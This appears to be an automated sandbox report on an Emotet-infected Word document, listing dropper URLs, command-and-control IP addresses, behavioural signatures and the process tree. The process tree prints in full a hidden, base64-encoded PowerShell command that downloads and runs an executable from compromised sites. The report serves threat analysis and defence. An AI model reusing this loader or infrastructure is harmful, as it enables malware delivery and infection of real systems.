Analysis

  • max time kernel
    25s
  • resource
    win10v191014
  • submitted
    16-12-2019 11:41

General

  • Target

    8b609fd8a3fa8035a22468460e491f21ffa438e527463173a2403dc4097640d9.doc

  • Sample

    191216-wxp89r22la

  • SHA256

    8b609fd8a3fa8035a22468460e491f21ffa438e527463173a2403dc4097640d9

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://helloseatravel.com/wp-content/EFtavrYg/

exe.dropper

http://goldonam.com/wp-admin/uv/

exe.dropper

http://mattonicomunicacao.com/agenciamento/ekuia/

exe.dropper

http://myagentco.com/new/vkn/

exe.dropper

https://usa.slackart.ch/wp-content/TxDVHvMRu8/

Extracted

Family

emotet

C2

85.152.174.56:80

59.148.227.190:80

5.154.58.24:80

46.105.131.87:80

37.59.24.177:8080

66.34.201.20:7080

108.179.206.219:8080

211.63.71.72:8080

47.6.15.79:80

201.173.217.124:443

98.24.231.64:80

201.251.133.92:443

116.48.142.21:443

74.105.102.97:8080

58.171.42.66:8080

169.239.182.217:8080

149.202.153.252:8080

91.73.197.90:80

186.75.241.230:80

73.214.99.25:80

rsa_pubkey.plain

Signatures

  • Executes dropped EXE 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8b609fd8a3fa8035a22468460e491f21ffa438e527463173a2403dc4097640d9.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4904
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1000
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:2900
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABVAHAAcQB0AHgAZQBuAHAAcwBjAHcAPQAnAEsAbgBzAHEAcQBkAGcAdwAnADsAJABPAHMAcQBlAG0AbQB4AHYAIAA9ACAAJwA3ADgAJwA7ACQATwBoAGYAYwBzAHYAaQBmAHEAcQB0AD0AJwBBAG4AaQB2AGkAcgBiAGkAbwBzACcAOwAkAE8AZQB6AHUAbABuAGkAeABrAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAHMAcQBlAG0AbQB4AHYAKwAnAC4AZQB4AGUAJwA7ACQAVQB2AGcAcwBkAHIAcwBuAGMAZgBxAD0AJwBXAHgAdQBxAGoAawBxAHkAagBxACcAOwAkAFkAaQBnAHcAaQB3AHkAYgB1AHUAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAG4ARQBUAC4AdwBFAGIAYwBMAGkARQBOAHQAOwAkAFgAegBmAHkAcwByAGsAYgBxAG8APQAnAGgAdAB0AHAAOgAvAC8AaABlAGwAbABvAHMAZQBhAHQAcgBhAHYAZQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARQBGAHQAYQB2AHIAWQBnAC8AKgBoAHQAdABwADoALwAvAGcAbwBsAGQAbwBuAGEAbQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdQB2AC8AKgBoAHQAdABwADoALwAvAG0AYQB0AHQAbwBuAGkAYwBvAG0AdQBuAGkAYwBhAGMAYQBvAC4AYwBvAG0ALwBhAGcAZQBuAGMAaQBhAG0AZQBuAHQAbwAvAGUAawB1AGkAYQAvACoAaAB0AHQAcAA6AC8ALwBtAHkAYQBnAGUAbgB0AGMAbwAuAGMAbwBtAC8AbgBlAHcALwB2AGsAbgAvACoAaAB0AHQAcABzADoALwAvAHUAcwBhAC4AcwBsAGEAYwBrAGEAcgB0AC4AYwBoAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFQAeABEAFYASAB2AE0AUgB1ADgALwAnAC4AIgBzAGAAUABsAEkAdAAiACgAJwAqACcAKQA7ACQASwBuAGsAYQBmAHoAcAB6AGwAeQB6AGIAPQAnAFoAYgBiAGcAdgB4AGoAbABtAHQAaAAnADsAZgBvAHIAZQBhAGMAaAAoACQARwBzAGQAYQB3AGgAZgBoAGYAYgAgAGkAbgAgACQAWAB6AGYAeQBzAHIAawBiAHEAbwApAHsAdAByAHkAewAkAFkAaQBnAHcAaQB3AHkAYgB1AHUALgAiAGQAbwB3AG4ATABvAGAAQQBkAGAARgBgAGkAbABFACIAKAAkAEcAcwBkAGEAdwBoAGYAaABmAGIALAAgACQATwBlAHoAdQBsAG4AaQB4AGsAKQA7ACQASQBxAHMAbABmAGQAeABzAGQAPQAnAFcAZgBhAHoAeQB5AHgAcwBkAHcAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABPAGUAegB1AGwAbgBpAHgAawApAC4AIgBMAGAARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAAMgA4ADEANwAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAGEAUgB0ACIAKAAkAE8AZQB6AHUAbABuAGkAeABrACkAOwAkAEMAdQBnAGsAegBiAHEAdABvAHUAaABqAHMAPQAnAFkAcAB1AHYAdABwAGoAcQB3AGsAbQBuACcAOwBiAHIAZQBhAGsAOwAkAE4AaQB4AGIAdwBqAGsAdwBtAHQAYwA9ACcASQBrAHMAcQBmAGwAZAB0AG4AYwBvAHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARQBqAGEAbgBuAHUAZQBhAG0AawBoAHcAPQAnAEMAYwBhAHQAYwB3AGIAZgBlAHUAJwA=
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:4472
      • C:\Users\Admin\78.exe
        "C:\Users\Admin\78.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4624
        • C:\Users\Admin\78.exe
          --a87aaf2b
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious behavior: EmotetMutantsSpam
          PID:4664

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4624-8-0x0000000002130000-0x0000000002147000-memory.dmp

      Filesize

      92KB

    • memory/4664-10-0x00000000005A0000-0x00000000005B7000-memory.dmp

      Filesize

      92KB

    • memory/4664-11-0x0000000000400000-0x000000000047D000-memory.dmp

      Filesize

      500KB

    • memory/4904-2-0x000002388EB56000-0x000002388EB59000-memory.dmp

      Filesize

      12KB